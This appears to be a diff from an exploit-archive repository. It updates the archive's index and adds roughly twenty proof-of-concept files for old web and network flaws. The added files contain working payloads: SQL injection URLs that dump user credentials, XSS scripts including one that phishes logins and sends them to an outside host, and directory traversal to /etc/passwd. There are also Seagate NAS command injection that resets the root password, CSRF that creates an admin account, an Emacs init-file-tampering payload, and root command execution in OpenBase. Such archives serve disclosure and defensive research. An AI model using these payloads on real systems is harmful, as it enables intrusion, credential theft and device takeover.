Updated 01_07_2014

files.csv

@@ -24470,7 +24470,7 @@ id,file,description,date,author,platform,type,port
 27398,platforms/php/webapps/27398.txt,"Pluck CMS 4.7 - HTML Code Injection",2013-08-07,"Yashar shahinzadeh",php,webapps,0
 27399,platforms/php/webapps/27399.txt,"Wordpress Booking Calendar 4.1.4 - CSRF Vulnerability",2013-08-07,"Dylan Irzi",php,webapps,0
 27400,platforms/windows/remote/27400.py,"HP Data Protector Arbitrary Remote Command Execution",2013-08-07,"Alessandro Di Pinto and Claudio Moletta",windows,remote,0
-27401,platforms/windows/remote/27401.py,"Open&Compact FTP Server 1.2 - Auth Bypass & Directory Traversal SAM Retrieval Exploit",2013-08-07,Wireghoul,windows,remote,0
+27401,platforms/windows/remote/27401.py,"Open&Compact FTP Server 1.2 (Gabriel's FTP Server) - Auth Bypass & Directory Traversal SAM Retrieval Exploit",2013-08-07,Wireghoul,windows,remote,0
 27402,platforms/hardware/webapps/27402.txt,"Hikvision IP Cameras 4.1.0 b130111 - Multiple Vulnerabilities",2013-08-07,"Core Security",hardware,webapps,0
 27403,platforms/php/webapps/27403.txt,"Wordpress Usernoise Plugin 3.7.8 - Persistent XSS Vulnerability",2013-08-07,RogueCoder,php,webapps,0
 27405,platforms/php/webapps/27405.txt,"Joomla Sectionex Component 2.5.96 - SQL Injection Vulnerability",2013-08-07,"Matias Fontanini",php,webapps,0
@@ -27548,3 +27548,43 @@ id,file,description,date,author,platform,type,port
 30706,platforms/asp/webapps/30706.txt,"CodeWidgets Web Based Alpha Tabbed Address Book Index.ASP SQL Injection Vulnerability",2007-10-24,"Aria-Security Team",asp,webapps,0
 30707,platforms/php/webapps/30707.txt,"Phpbasic basicFramework 1.0 Includes.PHP Remote File Include Vulnerability",2007-10-24,Alucar,php,webapps,0
 30708,platforms/asp/webapps/30708.txt,"Aleris Web Publishing Server 3.0 Page.ASP SQL Injection Vulnerability",2007-10-25,joseph.giron13,asp,webapps,0
+30711,platforms/linux/remote/30711.txt,"Shttp 0.0.x Remote Directory Traversal Vulnerability",2007-10-25,"Pete Foster",linux,remote,0
+30712,platforms/php/webapps/30712.txt,"Multi-Forums Directory.PHP Multiple SQL Injection Vulnerabilities",2007-10-25,KiNgOfThEwOrLd,php,webapps,0
+30713,platforms/multiple/dos/30713.html,"Mozilla FireFox 2.0.8 Sidebar Bookmark Persistent Denial Of Service Vulnerability",2007-10-26,"The Hacker Webzine",multiple,dos,0
+30714,platforms/unix/dos/30714.pl,"IBM Lotus Domino 7.0.2 IMAP4 LSUB Buffer Overflow Vulnerability",2007-10-27,"Manuel Santamarina Suarez",unix,dos,0
+30715,platforms/php/webapps/30715.txt,"WordPress 2.3 Edit-Post-Rows.PHP Cross-Site Scripting Vulnerability",2007-10-29,waraxe,php,webapps,0
+30716,platforms/php/webapps/30716.txt,"Smart-Shop index.php Multiple Parameter XSS",2007-10-29,Doz,php,webapps,0
+30717,platforms/php/webapps/30717.txt,"Omnistar Live KB.PHP Cross-Site Scripting Vulnerability",2007-10-29,Doz,php,webapps,0
+30718,platforms/php/webapps/30718.txt,"Saxon 5.4 Menu.PHP Cross-Site Scripting Vulnerability",2007-10-29,netVigilance,php,webapps,0
+30719,platforms/php/webapps/30719.txt,"Saxon 5.4 Example.PHP SQL Injection Vulnerability",2007-10-29,netVigilance,php,webapps,0
+30720,platforms/windows/remote/30720.html,"GlobalLink 2.7.0.8 ConnectAndEnterRoom ActiveX Control Stack Buffer Overflow Vulnerability",2007-10-29,anonymous,windows,remote,0
+30723,platforms/hardware/webapps/30723.php,"Seagate BlackArmor - Root Exploit",2014-01-06,"Jeroen - IT Nerdbox",hardware,webapps,0
+30724,platforms/linux/dos/30724.txt,"Perdition 1.17 IMAPD __STR_VWRITE Remote Format String Vulnerability",2007-10-31,"Bernhard Mueller",linux,dos,0
+30725,platforms/hardware/webapps/30725.txt,"Seagate BlackArmor NAS sg2000-2000.1331 - Remote Command Execution",2014-01-06,"Jeroen - IT Nerdbox",hardware,webapps,0
+30726,platforms/hardware/webapps/30726.2013-6922,"Seagate BlackArmor NAS sg2000-2000.1331 - Cross Site Request Forgery",2014-01-06,"Jeroen - IT Nerdbox",hardware,webapps,0
+30727,platforms/hardware/webapps/30727.txt,"Seagate BlackArmor NAS sg2000-2000.1331 - Multiple Persistent Cross Site Scripting Vulnerabilities",2014-01-06,"Jeroen - IT Nerdbox",hardware,webapps,0
+30729,platforms/multiple/remote/30729.txt,"Blue Coat ProxySG Management Console URI Handler Multiple Cross-Site Scripting Vulnerabilities",2007-10-29,"Adrian Pastor",multiple,remote,0
+30730,platforms/windows/remote/30730.txt,"SonicWALL SSL VPN 1.3 3 WebCacheCleaner ActiveX FileDelete Method Traversal Arbitrary File Deletion",2007-11-01,"Will Dormann",windows,remote,0
+30731,platforms/php/webapps/30731.txt,"Synergiser 1.2 Index.PHP Local File Include Vulnerability",2007-11-01,KiNgOfThEwOrLd,php,webapps,0
+30732,platforms/php/webapps/30732.txt,"CONTENTCustomizer 3.1 Dialog.PHP Information Disclosure Vulnerability",2007-11-01,d3hydr8,php,webapps,0
+30733,platforms/php/webapps/30733.txt,"phpMyAdmin <= 2.11.1 Server_Status.PHP Cross-Site Scripting Vulnerability",2007-10-17,"Omer Singer",php,webapps,0
+30734,platforms/php/webapps/30734.txt,"Helios Calendar 1.1/1.2 Admin/Index.PHP Cross Site Scripting Vulnerability",2007-11-02,"Ivan Sanchez",php,webapps,0
+30735,platforms/php/webapps/30735.txt,"PHP Helpdesk 0.6.16 Index.PHP Local File Include Vulnerability",2007-11-03,joseph.giron13,php,webapps,0
+30736,platforms/linux/remote/30736.txt,"GNU Emacs 22.1 Local Variable Handling Code Execution Vulnerability",2007-11-02,"Drake Wilson",linux,remote,0
+30737,platforms/php/webapps/30737.txt,"Galmeta Post 0.2 Upload_Config.PHP Remote File Include Vulnerability",2007-11-05,"arfis project",php,webapps,0
+30738,platforms/php/webapps/30738.txt,"E-Vendejo 0.2 Articles.PHP SQL Injection Vulnerability",2007-11-05,R00t[ATI],php,webapps,0
+30739,platforms/php/webapps/30739.txt,"JLMForo System Buscado.PHP Cross-Site Scripting Vulnerability",2007-11-05,"Jose Luis Gongora Fernandez",php,webapps,0
+30740,platforms/hardware/remote/30740.html,"BT Home Hub 6.2.2.6 Login Procedure Authentication Bypass Vulnerability",2007-11-05,"David Smith",hardware,remote,0
+30741,platforms/php/webapps/30741.txt,"easyGB 2.1.1 Index.PHP Local File Include Vulnerability",2007-11-05,"BorN To K!LL",php,webapps,0
+30742,platforms/multiple/remote/30742.txt,"OpenBase 10.0.x Buffer Overflow Vulnerability and Multiple Remote Command Execution Vulnerabilities",2007-11-05,"Kevin Finisterre",multiple,remote,0
+30743,platforms/asp/webapps/30743.txt,"i-Gallery 3.4 igallery.ASP Remote Information Disclosure Vulnerability",2007-11-05,hackerbinhphuoc,asp,webapps,0
+30744,platforms/linux/remote/30744.txt,"MySQL <= 5.1.23 Server InnoDB CONVERT_SEARCH_MODE_TO_INNOBASE Function Denial Of Service Vulnerability",2007-11-05,"Joe Gallo",linux,remote,0
+30745,platforms/php/webapps/30745.html,"Weblord.it MS-TopSites Unauthorized Access Vulnerability and HTML Injection Vulnerability",2007-11-06,0x90,php,webapps,0
+30746,platforms/php/webapps/30746.txt,"Computer Associates SiteMinder Web Agent Smpwservices.FCC Cross Site Scripting Vulnerability",2007-11-07,"Giuseppe Gottardi",php,webapps,0
+30747,platforms/asp/webapps/30747.txt,"Rapid Classified AgencyCatResult.ASP SQL Injection Vulnerability",2007-11-08,The-0utl4w,asp,webapps,0
+30748,platforms/php/webapps/30748.txt,"Xoops 2.0.17 1 Mylinks Module Brokenlink.PHP SQL injection Vulnerability",2007-11-09,root@hanicker.it,php,webapps,0
+30749,platforms/windows/dos/30749.html,"Microsoft Office 2003 Web Component Memory Access Violation Denial of Service Vulnerability",2007-11-12,"Elazar Broad",windows,dos,0
+30750,platforms/php/webapps/30750.pl,"PHP-Nuke Advertising Module 0.9 Modules.PHP SQL Injection Vulnerability",2007-11-12,0x90,php,webapps,0
+30751,platforms/php/webapps/30751.html,"Miro Broadcast Machine 0.9.9 Login.PHP Cross Site Scripting Vulnerability",2007-11-12,"Hanno Boeck",php,webapps,0
+30752,platforms/php/webapps/30752.txt,"Eggblog 3.1 Rss.PHP Cross-Site Scripting Vulnerability",2007-11-12,"Mesut Timur",php,webapps,0
+30753,platforms/php/webapps/30753.txt,"AutoIndex PHP Script 2.2.2/2.2.3 Index.PHP Denial of Service Vulnerability",2007-11-12,L4teral,php,webapps,0

platforms/asp/webapps/30743.txt

@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/26348/info
+
+i-Gallery is prone to a remote information-disclosure vulnerability because it fails to properly sanitize user-supplied input.
+
+Exploiting this issue may allow an unauthorized remote user to view arbitrary local files in the context of the webserver process. Information obtained may aid in further attacks.
+
+i-Gallery 3.4 is vulnerable to this issue; other versions may also be vulnerable. 
+
+http://www.example.com/gallery/igallery.asp?d=%5c../../%5c 

platforms/asp/webapps/30747.txt

@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/26379/info
+
+Rapid Classified is prone to an SQL-injection vulnerability because the application fails to properly sanitize user-supplied input before using it in an SQL query.
+
+A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database. 
+
+http://www.example.com/agencyCatResult.asp?cmbCat='%20UPDATE%20rftCategory%20set%20Category%20=%20'Aria-Security Team';-- 

platforms/hardware/remote/30740.html

@@ -0,0 +1,82 @@
+source: http://www.securityfocus.com/bid/26333/info
+
+BT Home Hub is prone to an authentication-bypass vulnerability.
+
+An attacker could exploit this issue to gain unauthorized access to the affected device.
+
+BT Home Hub firmware 6.2.2.6 is vulnerable; other versions may also be affected. 
+
+This exploit allows you to access most pages on a BTHomeHub Router, without needing to know the password. It has been tested to work with firmware version 6.2.2.6.
+
+<form>
+<input type="button" value="Download Current Router Configuration"
+onclick="window.open('http://bthomehub.home/cgi/b/backup/user.ini/bthomehub-config')">
+</form>
+
+<form>
+<input type="button" value="Wireless Configuration Page"
+onclick="window.open('http://bthomehub.home/cgi/b/_wli_/cfg/djfkhfd')">
+</form>
+
+<form>
+<input type="button" value="Wireless Security Configuration Page"
+onclick="window.open('http://bthomehub.home/cgi/b/_wli_/seccfg/dbddfbdb')">
+</form>
+
+<form>
+<input type="button" value="Wireless Repeater Configuation Page"
+onclick="window.open('http://bthomehub.home/cgi/b/_wds_/cfg/fjfgfgh')">
+</form>
+
+<form>
+<input type="button" value="Telephony Configuration Page"
+onclick="window.open('http://bthomehub.home/cgi/b/_voip_/cfg/fhfjhgg')">
+</form>
+<form>
+<input type="button" value="IP Addresses Configuration Page"
+onclick="window.open('http://bthomehub.home/cgi/b/intfs/_intf_/cfg/dgdgdg')">
+</form>
+
+<form>
+<input type="button" value="Devices Configuration Page"
+onclick="window.open('http://bthomehub.home/cgi/b/devs/cfg/fefefef')">
+</form>
+
+<form>
+<input type="button" value="Firewall Configuration Page"
+onclick="window.open('http://bthomehub.home/cgi/b/secpol/cfg/fjfjhfj')">
+</form>
+
+<form>
+<input type="button" value="Reset Router"
+onclick="window.open('http://bthomehub.home/cgi/b/info/reset/gegegee')">
+</form>
+
+<form>
+<input type="button" value="Restart Router"
+onclick="window.open('http://bthomehub.home/cgi/b/info/restart/fhfjhgg')">
+</form>
+
+<form>
+<input type="button" value="Remote Assistance Configuration Page"
+onclick="window.open('http://bthomehub.home/cgi/b/ras/fjgfgfgh')">
+</form>
+
+<form>
+<input type="button" value="Backup and Restore Configuration Page"
+onclick="window.open('http://bthomehub.home/cgi/b/bandr/fjgfgfgh')">
+</form>
+
+<form>
+<input type="button" value="Home Network Page"
+onclick="window.open('http://bthomehub.home/cgi/b/lan/fjgfgfgh')">
+</form>
+
+<form>
+<input type="button" value="Phone Logs Page"
+onclick="window.open('http://bthomehub.home/cgi/b/_voip_/stats/dhjfhdfjh')">
+</form>
+
+
+
+

platforms/hardware/webapps/30725.txt

@@ -0,0 +1,65 @@
+# Exploit Title: Seagate BlackArmor NAS - Remote Command Execution
+
+# Google Dork: N/A
+
+# Date: 04-01-2014
+
+# Exploit Author: Jeroen - IT Nerdbox
+
+# Vendor Homepage:  <http://www.seagate.com/> http://www.seagate.com/
+
+# Software Link:
+<http://www.seagate.com/support/downloads/item/banas-220-firmware-master-dl/
+>
+http://www.seagate.com/support/downloads/item/banas-220-firmware-master-dl/
+
+# Version: sg2000-2000.1331
+
+# Tested on: N/A
+
+# CVE : CVE-2013-6924
+
+#
+
+## Description:
+
+#
+
+# The file getAlias.php located in /backupmgt has the following lines:
+
+#
+
+# $ipAddress = $_GET["ip";
+
+# if ($ipAddress != "") {
+
+#    exec("grep -I $ipAddress $immedLogFile > aliasHistory.txt");
+
+#    ..
+
+#    ..
+
+# }
+
+#
+
+# The GET parameter can easily be manipulated to execute commands on the
+BlackArmor system.
+
+#
+
+## Proof of Concept:
+
+#
+
+# http(s)://<ip | host>/backupmgt/getAlias.php?ip=xx /etc/passwd; <your
+command here>;
+
+#
+
+## Example to change the root password to 'mypassword':
+
+#
+
+# http(s)://<ip | host>/backupmgt/getAlias.php?ip=xx /etc/passwd; echo
+'mypassword' | passwd --stdin;

platforms/hardware/webapps/30726.2013-6922

@@ -0,0 +1,62 @@
+# Exploit Title: Seagate BlackArmor NAS - Cross Site Request Forgery
+
+# Google Dork: N/A
+
+# Date: 04-01-2014
+
+# Exploit Author: Jeroen - IT Nerdbox
+
+# Vendor Homepage: http://www.seagate.com/
+
+# Software Link:
+http://www.seagate.com/support/downloads/item/banas-220-firmware-master-dl/
+
+# Version: sg2000-2000.1331
+
+# Tested on: N/A
+
+# CVE : CVE-2013-6922
+
+#
+
+## Description:
+
+#
+
+# There are multiple CSRF attacks possible, the proof of concept shows how
+it is possible to add
+
+# a user with administrative privileges to the system.
+#
+# It is also possible to:
+
+# 
+
+# 1. Factory reset the device
+
+# 2. Reboot the device
+
+# 3. Add/Edit/Remove users
+# 4. Add/Edit/Remove shares and volumes
+
+#
+# This vulnerability was reported to Seagate in September 2013, they stated
+that this will not be fixed. 
+
+#
+
+## Proof of Concept:
+
+# 
+
+# POST: http(s)://<url |
+ip>/admin/access_control_user_add.php?lang=en&gi=a001&fbt=23
+# Parameters:
+
+#
+
+# username attacker
+# adminright yes
+# fullname hacker
+# userpasswd attackers_password
+# userpasswdcheck attackers_password

platforms/hardware/webapps/30727.txt

@@ -0,0 +1,75 @@
+# Exploit Title: Seagate BlackArmor NAS - Multiple Persistent Cross Site
+Scripting Vulnerabilities
+
+# Google Dork: N/A
+
+# Date: 04-01-2014
+
+# Exploit Author: Jeroen - IT Nerdbox
+
+# Vendor Homepage:  <http://www.seagate.com/> http://www.seagate.com/
+
+# Software Link:
+<http://www.seagate.com/support/downloads/item/banas-220-firmware-master-dl/
+>
+http://www.seagate.com/support/downloads/item/banas-220-firmware-master-dl/
+
+# Version: sg2000-2000.1331
+
+# Tested on: N/A
+
+# CVE : CVE-2013-6923
+
+#
+
+## Description:
+
+#
+
+# When adding a user to the device, it is possible to enter a full name.
+This input field does not
+
+# sanitize its input and it is possible to enter any payload which will get
+executed upon reload.
+
+#
+
+# The workgroup configuration is also vulnerable to persistent XSS. The Work
+Group name input 
+# field does not sanitize its input.
+
+#
+# This vulnerability was reported to Seagate in September 2013, they stated
+that this will not be fixed. 
+
+#
+
+## Proof of Concept #1:
+
+# 
+
+# POST: http(s)://<url | ip>/admin/access_control_user_edit.php?id=2&lang=en
+# Parameters:
+
+#
+
+# index = 2
+# fullname = <script>alert(1);</script>
+# submit = Submit
+
+# 
+
+#
+
+## Proof of Concept #2:
+
+#
+
+# POST: http(s)://<url |
+ip>/admin/network_workgroup_domain.php?lang=en&gi=n003
+
+# Parameter:
+
+#
+
+# workname = "><input onmouseover=prompt(1) >

platforms/linux/dos/30724.txt

@@ -0,0 +1,11 @@
+source: http://www.securityfocus.com/bid/26270/info
+
+Perdition IMAP proxy server is prone to a remote format-string vulnerability because it fails to properly sanitize user-supplied input before passing it as the format specifier to a formatted-printing function.
+
+An attacker can exploit this issue to execute arbitrary machine code in the context of the affected application. A successful attack will compromise the application. Failed attempts may cause denial-of-service conditions.
+
+This issue affects Perdition 1.17 and prior versions. 
+
+The following proof of concept is available:
+
+perl -e 'print "abc%n\x00\n"' | nc perdition.example.com 143

platforms/linux/remote/30711.txt

@@ -0,0 +1,26 @@
+source: http://www.securityfocus.com/bid/26212/info
+
+Shttp is prone to a remote directory-traversal vulnerability.
+
+A remote attacker can exploit this issue by using directory-traversal sequences to retrieve arbitrary files on a victim user's computer.
+
+Versions prior to Shttp0.0.5 are vulnerable to this issue.
+
+HEAD /../../etc/passwd HTTP/1.0
+
+HTTP/1.1 400 Bad Request
+Content-Type: text/html
+Server: Shttp/ServerKit
+Date: Thu, 25 Oct 2007 16:31:30 GMT
+Connection: close
+
+
+HEAD /../../var/log/messages HTTP/1.0
+
+HTTP/1.1 200 OK
+Content-Length: 178455
+Content-Type: text/plain
+Last-Modified: Thu, 25 Oct 2007 16:36:39 GMT
+Server: Shttp/ServerKit
+Date: Thu, 25 Oct 2007 16:42:32 GMT
+Connection: close 

platforms/linux/remote/30736.txt

@@ -0,0 +1,21 @@
+source: http://www.securityfocus.com/bid/26327/info
+
+Emacs is prone to a vulnerability that lets attackers execute arbitrary code.
+
+Due to a design error, the application ignores certain security settings and modifies local variables.
+
+By supplying a malicious file, an attacker can exploit this issue to carry out various attacks, including executing arbitrary code in the context of the application. This may facilitate remote unauthorized access.
+
+This issue affects Emacs 22.1; other versions may be vulnerable as well. 
+
+This is a harmless text file.  Or at least it looks like one.  In
+fact, it is.  But it's almost not.  If you were to change the word
+"variaboles" below to "variables", then load it into a vulnerable
+Emacs 22 with `enable-local-variables' set to :safe, it would rewrite
+the local variables list in the buffer itself to _look_ like a
+harmless text file, while in fact managing to add some evil code to
+the end of your user-init-file.  Woopsy.
+
+| Local variaboles:
+| hack-local-variables-hook: ((lambda () (save-excursion (with-temp-buffer (insert "\n(run-with-timer 1 nil (lambda () (beep) (message \"Your Emacs init file is compromised!\")))") (append-to-file (point-min) (point-max) user-init-file)) (message nil) (with-current-buffer (get-buffer "*Messages*") (when (search-backward (concat "Added to " user-init-file) nil t) (let ((start (point-at-bol))) (forward-line +1) (delete-region start (point))))) (goto-char (point-max)) (search-backward "| hack-local-variables-hook") (let ((start (point-at-bol))) (forward-line +1) (delete-region start (point))) (insert "| mode: text\n") (set-buffer-modified-p nil) (text-mode))))
+| End:

platforms/linux/remote/30744.txt

@@ -0,0 +1,22 @@
+source: http://www.securityfocus.com/bid/26353/info
+
+MySQL is prone to a remote denial-of-service vulnerability because the database server fails to properly handle unexpected input.
+
+Exploiting this issue allows remote attackers to crash affected database servers, denying service to legitimate users. Attackers must be able to execute arbitrary SQL statements on affected servers, which requires valid credentials to connect to affected servers.
+
+This issue affects MySQL 5.1.23 and prior versions. 
+
+mysql> CREATE TABLE `test` (
+`id` int(10) unsigned NOT NULL AUTO_INCREMENT PRIMARY KEY,
+`foo` text NOT NULL
+) ENGINE=InnoDB DEFAULT CHARSET=latin1;
+Query OK, 0 rows affected
+
+mysql> SELECT * FROM test WHERE CONTAINS(foo, 'bar');
+Empty set
+
+mysql> ALTER TABLE test ADD INDEX (foo(100));
+Query OK, 0 rows affected
+Records: 0 Duplicates: 0 Warnings: 0
+
+mysql> SELECT * FROM test WHERE CONTAINS(foo, 'bar'); 

platforms/multiple/dos/30713.html

@@ -0,0 +1,61 @@
+source: http://www.securityfocus.com/bid/26216/info
+
+Mozilla Firefox is prone to a vulnerability that results in a persistent denial of service.
+
+This issue occurs when a victim sets a malicious bookmark and then follows it.
+
+Successful attacks will cause Firefox to stop responding to all URI requests.
+
+NOTE: This condition persists even after the browser is restarted.
+
+Mozilla Firefox 2.0.0.8 is vulnerable; other versions may also be affected. 
+
+<script>
+
+
+
+window.sidebar.addPersistentPanel('AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAARRGGHH!
+
+...and more AA\'s!:)',
+
+'http://www.example.com','\0');
+
+
+
+</script>

platforms/multiple/remote/30729.txt

@@ -0,0 +1,11 @@
+source: http://www.securityfocus.com/bid/26286/info
+
+Blue Coat ProxySG Management Console is prone to two cross-site scripting vulnerabilities because the application fails to properly sanitize user-supplied input.
+
+An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
+
+Versions prior to ProxySG 4.2.6.1 and 5.2.2.5 are vulnerable.
+
+NOTE: This BID originally covered one issue, but was updated to also cover a second issue. 
+
+https://www.example.com:8082/Secure/Local/console/install_upload_action/crl_format?name="<script>alert("XSS")</script>%00 https://www.example.com:8082/Secure/Local/console/install_upload_from_file.htm?file=<script>alert("XSS")</script><!-- Example Payload: <script> do { a=prompt("Blue Coat SG400: an error has occurred\nPlease enter your USERNAME",""); b=prompt("Blue Coat SG400: an error has occurred\nPlease enter your PASSWORD",""); }while(a==null || b==null || a=="" || b==""); alert("owned!:"+a+"/"+b);window.location="http://www.example2.com/?u="+a+"&p="+b </script><!-- 

platforms/multiple/remote/30742.txt

@@ -0,0 +1,51 @@
+source: http://www.securityfocus.com/bid/26347/info
+
+OpenBase is prone to a buffer-overflow vulnerability and multiple remote command-execution vulnerabilities.
+
+An attacker could exploit these issues to execute arbitrary code or commands with superuser privileges. Successfully exploiting these issues will facilitate in the complete compromise of affected computers. 
+
+1. call AsciiBackup('\`id\`')
+results in commands being run as root.
+
+desktop:/tmp kfinisterre$ tail -f /tmp/isql_messages
+
+OpenBase ISQL version 8.0 for MacOS X
+Copyright (c) 1993-2003 OpenBase International. Ltd.
+All Rights Reserved.
+
+Using database 'WOMovies' on host 'localhost'
+
+Could not write file:uid=0(root) gid=0(wheel) groups=0(wheel)/WOMovies.bck
+
+2. call GlobalLog("../../../path/to/file", "\n user input goes here \n")
+results in root owned files being created. Combine with above for an
+easy backdoor.
+
+openbase 1> call GlobalLog("../../../../../../etc/periodic/daily/600"
+, "\n/usr/bin/id > /tmp/file\n")
+openbase 2> go
+Data returned... calculating column widths
+
+return_0
+- ----------
+Success
+- ----------
+1 rows returned - 0.039 seconds (printed in 0.039 seconds)
+openbase 1>  call AsciiBackup('`chmod +x /etc/periodic/daily/600.msg;
+/usr/sbin/periodic daily`')
+openbase 2> go
+Data returned... calculating column widths
+
+return_0
+- ----------
+Failure
+- ----------
+1 rows returned - 1.825 seconds (printed in 1.826 seconds)
+openbase 1>
+
+3. select aaaaaaaaaaaaaaaaaaaa... from aaaaaaaaaaaaaaaaaaa...
+results in zone_free() issues referencing 0x61616161
+
+4. call OEMLicenseInstall("`/usr/bin/id>/tmp/aaax`","`/usr/bin/id>/tmp/bbbx
+`","`/usr/bin/id>/tmp/ddddx`","`/usr/bin/id>/tmp/cdfx`")
+results in commands being run as root

platforms/php/webapps/30712.txt

@@ -0,0 +1,8 @@
+source: http://www.securityfocus.com/bid/26213/info
+
+Multi-Forums is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in SQL queries.
+
+Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. 
+
+http://www.example.com/directory.php?go=-1+union+select+1,concat(name,0x3a,password),3+from+[forum]_members+where+id=[id]
+http://www.example.com/directory.php?cat=-1+union+select+1,concat(name,0x3a,password),3+from+[forum]_members+where+id=[id] 

platforms/php/webapps/30715.txt

@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/26228/info
+
+WordPress is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
+
+This issue affects WordPress 2.3; other versions may also be vulnerable. 
+
+http://www.example.com/wp-admin/edit-post-rows.php?posts_columns[]=<script>alert(123);</script> 

platforms/php/webapps/30716.txt

@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/26232/info
+
+SMART-SHOP is prone to multiple cross-site scripting vulnerabilities because the application fails to sufficiently sanitize user-supplied input.
+
+Exploiting these vulnerabilities may allow an attacker to perform cross-site scripting attacks on unsuspecting users in the context of the affected website. As a result, the attacker may be able to steal cookie-based authentication credentials and to launch other attacks. 
+
+http://www.example.com/index.php?page=&email=<Evil-Script> 
+http://www.example.com/index.php?page=home&command=<Evil-Script> 
+http://www.example.com/index.php?page=home&component=currencies&command=<Evil-Script> http://www.example.com/index.php?page=home&component=basket&command=%3Cscript%3Ealert(document.cookie);%3C/script%3E 

platforms/php/webapps/30717.txt

@@ -0,0 +1,8 @@
+source: http://www.securityfocus.com/bid/26234/info
+
+Omnistar Live is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks. 
+
+http://www.example.com/smartshop/users/kb.php?id=10002&category_id=XSS
+http://www.example.com/users/kb.php?category_id=XSS 

platforms/php/webapps/30718.txt

@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/26237/info
+
+Saxon is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
+
+This issue affects Saxon 5.4; earlier versions may also be vulnerable. 
+
+http://www.example.com/admin/menu.php?config[news_url]="><script>alert(document.cookies)</script> 

platforms/php/webapps/30719.txt

@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/26238/info
+
+Saxon is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+
+Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+This issue affects Saxon 5.4; earlier versions may also be affected. 
+
+http://www.example.com/example.php?template=' UNION SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(USER_NAME, USER_PWD), NULL FROM SX_saxon_users %23 

platforms/php/webapps/30731.txt

@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/26289/info
+
+Synergiser is prone to a local file-include vulnerability because it fails to properly sanitize user-supplied input.
+
+Exploiting this issue may allow an unauthorized user to view files and execute local scripts.
+
+Synergiser 1.2 RC1 is vulnerable to this issue; other versions may also be affected.
+
+http://www.example.com/index.php?page=../../../../../../../../../../../etc/passwd 

platforms/php/webapps/30732.txt

@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/26291/info
+
+CONTENTCustomizer is prone to an information-disclosure vulnerability.
+
+An attacker can exploit this issue to access sensitive information that may lead to further attacks.
+
+CONTENTCustomizer 3.1mp is vulnerable; other versions may also be affected. 
+
+http://www.example.com/dialog.php?action=editauthor&doc=pagename 

